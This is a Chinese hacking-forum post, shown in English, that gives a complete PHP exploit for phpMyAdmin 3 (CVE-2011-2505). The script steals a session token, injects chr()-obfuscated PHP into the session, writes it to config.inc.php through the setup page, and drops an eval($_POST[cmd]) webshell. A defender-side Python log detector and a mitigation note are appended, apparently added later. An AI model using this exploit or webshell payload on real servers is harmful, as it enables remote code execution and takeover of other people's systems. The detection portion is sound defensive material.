中国网络渗透测试联盟
Title: phpadmin3 remote code execute PHP-version exploit
Author: admin
Time: 2013-2-21 09:13
I've recently been a full-time stay-at-home dad; I've been out of touch with what goes on in the scene for many months now, and the blog hasn't been updated either.

Last night I was up all night with the baby and saw 黑哥's discussion of the phpMyAdmin 3 vulnerability in the PHP security group. I hadn't read the vulnerable code before, though I had seen wofeiwo's exp on Weibo a while back. But 黑哥 said there was a non-jilei (genuinely usable) way to exploit it, so that night I dug out the code and studied it, and wrote this reheated exp. Since I came to it late and plenty of people had already studied it and written exps, mine counts as reheating leftovers, just research to pass the time.

First, kudos to wofeiwo's Python version of the exp, and kudos to the diligence of wofeiwo and superhei, role models worth learning from. That earlier exp, however, had some limitations when used:

1. session.auto_start = 1;

2. in the default pma3 code, the libraries directory is already blocked from access by .htaccess.

And of course there is a third point, a gulf nobody can cross: the config directory must exist and be writable.

After reading 黑哥's remarks in the group and going over the code again, I found that the first two limitations can both be ignored. So this vulnerability really isn't all that jilei.

So I wrote this PHP version of the exp; the code is as follows:
#!/usr/bin/php
<?php
print_r('
+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
by oldjun(www.oldjun.com)
welcome to www.t00ls.net
mail:oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
');

/**
 * working when the directory:"config" exists and is writeable.
 **/

if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host: target server (ip/hostname)
path: path to pma3
Example:
php '.$argv[0].' localhost /pma/
+---------------------------------------------------------------------------+
');
    exit;
}

$host = $argv[1];
$path = $argv[2];

/**
 * Try to determine if the directory:"config" exists
 **/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr = php_request('config/');
if (strpos($returnstr, '404')) {
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
}

/**
 * Try to get token and sessionid
 **/
echo "[+] Try to get token and sessionid....\n";
$result = php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token = $resp[3];
$sessionid = $resp[1];
if ($token && $sessionid) {
    echo "[+] token:$token\n";
    echo "[+] Session ID:$sessionid\n";
} else {
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
}

/**
 * Try to insert shell into session
 **/
echo "[+] Try to insert shell into session....\n";
php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net', '', 'phpMyAdmin='.$sessionid); // Actually, almost all the php files in home directory of pma3 can be used here.

/**
 * Try to create webshell
 **/
echo "[+] Try to create webshell....\n";
php_request('setup/config.php', 'phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save', 'phpMyAdmin='.$sessionid);

/**
 * Try to check if the webshell was created successfully
 **/
echo "[+] Try to check if the webshell was created successfully....\n";
$content = php_request('config/config.inc.php');
if (strpos($content, 't00ls')) {
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
} else {
    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
}

/**
 * Send one raw HTTP/1.1 request (GET, or POST when $data is given) and return the full response.
 **/
function php_request($url, $data = '', $cookie = '') {
    global $host, $path;

    $method = $data ? 'POST' : 'GET';

    $packet  = $method." ".$path.$url." HTTP/1.1\r\n";
    $packet .= "Accept: */*\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= $data ? "Content-Type: application/x-www-form-urlencoded\r\n" : "";
    $packet .= $data ? "Content-Length: ".strlen($data)."\r\n" : "";
    $packet .= $cookie ? "Cookie: $cookie\r\n" : "";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data ? $data : "";

    $fp = fsockopen(gethostbyname($host), 80);
    if (!$fp) {
        echo 'No response from '.$host;
        die;
    }
    fputs($fp, $packet);

    $resp = '';
    while ($fp && !feof($fp)) {
        $resp .= fread($fp, 1024);
    }

    return $resp;
}
?>
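The exploit above leaves a recognisable trace in a web server's access log, and that is what a defender can key on: a request to any phpMyAdmin script whose query string carries session_to_unset together with an _SESSION[...] parameter (the post notes that almost any PHP file in the pma3 root will do, so the script name is not a reliable indicator), followed by a POST to setup/config.php that writes the poisoned session into config/config.inc.php, and then a fetch of config/config.inc.php. The following script is an added example, not part of the original post and not phpMyAdmin's own code; it assumes Apache "combined" log format, and the log lines in SAMPLE_LOG are constructed for the example.

```python
"""Detect the CVE-2011-2505 exploitation pattern in Apache access logs.

Added defender-side example (not from the original post). It scores each
client IP by the exploit steps observed: session injection via
session_to_unset + _SESSION[...], a POST to setup/config.php, and a read of
config/config.inc.php. The log lines below are constructed for this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format (assumed); only the fields we need are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log: one full exploit sequence from 10.0.0.5 and a
# lone POST to setup/config.php from 192.0.2.9 (e.g. a legitimate setup run).
SAMPLE_LOG = """\
10.0.0.5 - - [21/Feb/2013:09:13:01 +0800] "GET /pma/index.php HTTP/1.1" 200 5123
10.0.0.5 - - [21/Feb/2013:09:13:02 +0800] "GET /pma/db_create.php?token=abc&session_to_unset=t00ls&_SESSION%5BConfigFile%5D%5BServers%5D%5B0%5D%5Bhost%5D=x HTTP/1.1" 200 312
10.0.0.5 - - [21/Feb/2013:09:13:03 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 77
10.0.0.5 - - [21/Feb/2013:09:13:04 +0800] "GET /pma/config/config.inc.php HTTP/1.1" 200 44
192.0.2.9 - - [21/Feb/2013:09:20:00 +0800] "GET /pma/index.php?token=def HTTP/1.1" 200 5123
192.0.2.9 - - [21/Feb/2013:09:20:05 +0800] "POST /pma/setup/config.php HTTP/1.1" 200 77
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    parts = urlsplit(entry["target"])
    entry["path"] = parts.path
    # parse_qs percent-decodes keys, so "_SESSION%5B..." becomes "_SESSION[...]".
    entry["query"] = parse_qs(parts.query, keep_blank_values=True)
    return entry


def classify(entry):
    """Return the exploit step a request matches, or None for benign traffic."""
    path = entry["path"].lower()
    keys = [k.lower() for k in entry["query"]]
    # Step 1: session poisoning. The script name is deliberately not checked,
    # because nearly any pma3 root script accepts these parameters.
    if "session_to_unset" in keys and any(k.startswith("_session[") for k in keys):
        return "session_injection"
    # Step 2: the setup script is asked to persist the (poisoned) session.
    if entry["method"] == "POST" and path.endswith("/setup/config.php"):
        return "config_write"
    # Step 3: the written config file is fetched to verify the result.
    if path.endswith("/config/config.inc.php"):
        return "config_fetch"
    return None


def find_steps(log_text):
    """Map each client IP to the sorted list of exploit steps seen from it."""
    steps = defaultdict(set)
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        step = classify(entry)
        if step:
            steps[entry["ip"]].add(step)
    return {ip: sorted(seen) for ip, seen in steps.items()}


def flagged_clients(log_text):
    """IPs that performed both session injection and the config write: strong signal."""
    return sorted(ip for ip, seen in find_steps(log_text).items()
                  if "session_injection" in seen and "config_write" in seen)


if __name__ == "__main__":
    for ip, seen in find_steps(SAMPLE_LOG).items():
        print(ip, seen)
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

A single POST to setup/config.php is normal during an administrator's initial setup, which is why the script only flags a client that also sent the session-poisoning request; in practice the stronger mitigation the post itself points at is to remove the writable config directory once phpMyAdmin is configured, which leaves the sequence with nothing to write.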
Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2